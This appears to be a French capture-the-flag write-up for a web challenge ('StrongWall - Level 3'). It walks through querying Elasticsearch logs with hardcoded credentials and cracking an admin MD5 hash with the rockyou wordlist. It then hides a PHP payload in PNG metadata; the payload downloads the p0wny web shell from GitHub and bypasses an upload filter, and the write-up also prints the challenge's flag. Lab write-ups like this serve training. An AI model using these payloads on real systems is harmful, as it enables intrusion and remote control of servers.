# StrongWall - Level 3
 

## Informations sur le challenge
 
 
 <table>
 <tr>
     <td>Nom de l'épreuve</td>
     <td>StrongWall - Level 2</td>
 </tr>
 <tr>
     <td>Créateur</td>
     <td>RavenXploit (Romain ORTEGA)</td>
 </tr>   
 <tr>
     <td>Niveau de l'épreuve</td>
     <td>3/3</td>
 </tr>
 <tr>
     <td>Catégorie de l'épreuve</td>
     <td>Web</td>
 </tr>
 <tr>
     <td>Points attribués</td>
     <td>TODO</td>
 </tr>
 </table>
 
 
 ## Consignes :
 
 Ce challenge représente le niveau final du challenge StrongWall.
 Le niveau suivant ne peut-être débloqué tant que le précédent n'a pas été résolu.
 
 Dans ce troisième niveau vous n'aurez pas plus de consigne ! ;)

 Le flag est de la forme fl@g{}
 
 Bonne chance !
 

## Analyse

Lors du niveau précédent nous avions réussi à nous connecter à l'application et à accéder à la page d'accueil : 

![index](images/index.png)

Nous pouvons voir qu'il existe une deuxième page dans la barre de navigation : 

![index](images/upload_user.png)

Et là c'est le drame... Vous souvenez vous que nous avions pris les crédentials du premier utilisateur venu lors du level 2 ? 

Il nous reste plus qu'à trouver le compte administrateur ! 

Comment ça c'est plus facile à dire qu'à faire ? 
Bon d'accord je vous l'accorde nous ne savons pas comment s'appelle le compte administrateur...

Réfléchissons trente secondes sur le log que nous avions récupéré : 

```bash
curl -u strongwall:S3cur3P4ssw0rd -X GET "localhost:9200/logs/_search/?pretty" -H 'Content-Type: application/json' -d'
{
  "query": { "match_all": {} }
} '

[ ... ]

 {
        "_index" : "logs",
        "_type" : "_doc",
        "_id" : "VygIZXABNCgwxw-cOfT9",
        "_score" : 1.0,
        "_source" : {
          "log_date" : 1581983789,
          "log_level" : "INFO",
          "host" : "222.174.255.133",
          "operation" : "AUTH",
          "message" : "cm9ibGVzOmVmNGNkZDMxMTc3OTNiOWZkNTkzZDc0ODg0MDk2MjZk"
        }
[ ... ]
```

Et si les différents composants du log n'étaient pas mis ici au hasard ?

Y'aurait-il d'autre opérations et niveaux de logs ? Vérifions cela : 

```python
from elasticsearch import Elasticsearch
import base64
import hashlib

ROCK_YOU_LIKE_AN_HURRICANE = "/usr/share/wordlists/rockyou.txt"

def dic_attack(md5_hash):
    print(md5_hash)
    pwds = open(ROCK_YOU_LIKE_AN_HURRICANE, encoding = "ISO-8859-1").read().split('\n')

    for pwd in pwds:
        if md5_hash == hashlib.md5(pwd.encode()).hexdigest():
            return pwd

    return None

CREDENTIALS = ('strongwall','S3cur3P4ssw0rd')

es = Elasticsearch(
    http_auth=(CREDENTIALS)
)


logs = es.search(index="logs", body={"query": {"match_all": {}}, 'size' : 10000})


decoded = None

for log in logs['hits']['hits']:
    if log['_source']['log_level']  != 'INFO' or log['_source']['operation'] != 'AUTH':

        msg = log['_source']['message']

        decoded = base64.b64decode( msg ).decode("utf-8")
        break


if decoded:

    decoded = decoded.replace('\'', '')
    username, md5_hash = str(decoded).split(':')

    pwd = dic_attack(md5_hash)

    if pwd:
        print(username, ' : ', pwd)
```

Vous remarquerez la variable "ROCK_YOU_LIKE_AN_HURRICANE" et vous devez sûrement vous rappeler du robots.txt ? 
C'est le moment d'utiliser la liste rockyou ! ;)

![](./images/brute-force.gif)

```bash
python3 exploit_part1.py

339a65e93299ad8d72c42b263aa23117
4dm1n1str4t0r  :  lucky
```

Nous avons donc maitenant le compte admin, authentifions-nous et passons aux choses sérieuses.

Nous revenons sur la page d'upload et on tente d'envoyer un fichier (autre qu'une image) : 

![bad file](images/upload_bad_file.png)

Nous avons le droit à une jolie erreur... 

Tentons maitenant de faire passer une image avec une extension en .php.
Nous n'avons pas de message d'erreur. 

Retournons dans la galerie : 

![test upload bad extension](images/hack_galerie.png)

Notre image avec une extension en .php est bien passée.
Le développeur ne vérifie pas les extensions de fichier mais véfie sûrement le type MIME.

Une seule solution me vient en tête : passons un shell php dans les données exifs ! 


## Exploit 

![](images/mr-robot.gif)

Nous n'avons pas vérifié la limite de taille, mais dans le doute, nous allons utiliser PIL pour créer un png d'un seul pixel.

```python
from PIL import Image
from PIL import PngImagePlugin

img = Image.new('RGB', (1,1), color='white')
meta = PngImagePlugin.PngInfo()
meta.add_text("exploit", "<?php $shell=file_get_contents('https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php'); $fp = fopen('shell.php', 'w');fwrite($fp, $shell);fclose($fp);?>")
img.save('exploit.php', 'png', pnginfo=meta)
quit()
```

Comme vous pouvez le voir nous allons récupérer l'excellent p0wny-shell directement sur github.

Une fois notre png malicieux téléversé, nous nous rendons sur la galerie pour déclencher notre script malicieux.

Il ne nous reste plus qu'à accéder à /uploads/shell.php et nous trouvons très rapidement le flag à la racine de l'application : 

![](images/shell.png)


WP ! Voici le troisième flag : fl@g{T0uj0rsT0utV3r1f13r!}


Keep hacking ! ;)
